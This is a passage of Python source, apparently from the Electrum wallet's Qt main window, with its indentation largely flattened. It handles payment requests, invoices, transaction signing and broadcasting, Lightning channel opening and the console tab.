hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
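        # If an OpenAlias is configured and it resolves to an address belonging
        # to this wallet, sign the on-chain payment request with that key,
        # asking for the wallet password if the keystore is encrypted.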
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
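        # Pick an unused receiving address; if none are left, either warn about
        # address reuse (non-deterministic wallets) or, for deterministic
        # wallets, offer to derive a new address that may not be restored
        # automatically from seed. Then create, store and sign the request.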
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
        if title is None:
            tooltip_text = _("Text copied to clipboard")
        else:
            tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
self.payto_e.addPasteButton(self.app)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Send queue'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
tx = make_tx(0)
except MultipleSpendMaxTxOutputs as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
except NotEnoughFunds as e:
self.max_button.setChecked(False)
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_error(text)
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
self.save_pending_invoice()
def task():
coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
return fut.result()
self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
def save_pending_invoice(self):
if not self.pending_invoice:
return
self.do_clear()
self.wallet.save_invoice(self.pending_invoice)
self.invoice_list.update()
self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected 'no coins'.
"""
return self.utxo_list.get_spend_list()
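# Illustrative note (not upstream code): callers distinguish the three possible
# results. A minimal sketch of the caller-side branching, mirroring get_coins()
# above:
#     coins = self.get_manually_selected_coins()
#     if coins is None:      # coin control not in use -> fall back to all spendable coins
#         coins = self.wallet.get_spendable_coins(None)
#     elif not coins:        # user explicitly selected "no coins"
#         pass               # nothing is spendable from the selection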
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
def pay_onchain_dialog(
self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
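# PayToEdit encodes "spend max" as the sentinel value '!' in an output's value.
# At most one output may use it; if any output does, output_value becomes '!'
# and is passed to ConfirmTxDialog instead of a fixed sum.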
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if conf_dlg.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not conf_dlg.have_enough_funds_assuming_zero_fees():
text = self.get_text_not_enough_funds_mentioning_frozen()
self.show_message(text)
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
return
cancelled, is_send, password, tx = conf_dlg.run()
if cancelled:
return
if is_send:
self.save_pending_invoice()
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
preview_dlg = PreviewTxDialog(
window=self,
make_tx=make_tx,
external_keypairs=external_keypairs,
output_value=output_value)
preview_dlg.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
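# Plugins may wrap the success callback via the 'tc_sign_wrapper' hook (used by
# the TrustedCoin 2FA plugin, for example) to insert their own co-signing step;
# if no plugin handles the hook, the plain on_success callback is kept.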
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
node_id, rest = extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(
connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
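# Expose every public command from Commands in the console namespace, routing
# calls through c._run so they use this window's wallet and password prompt.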
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
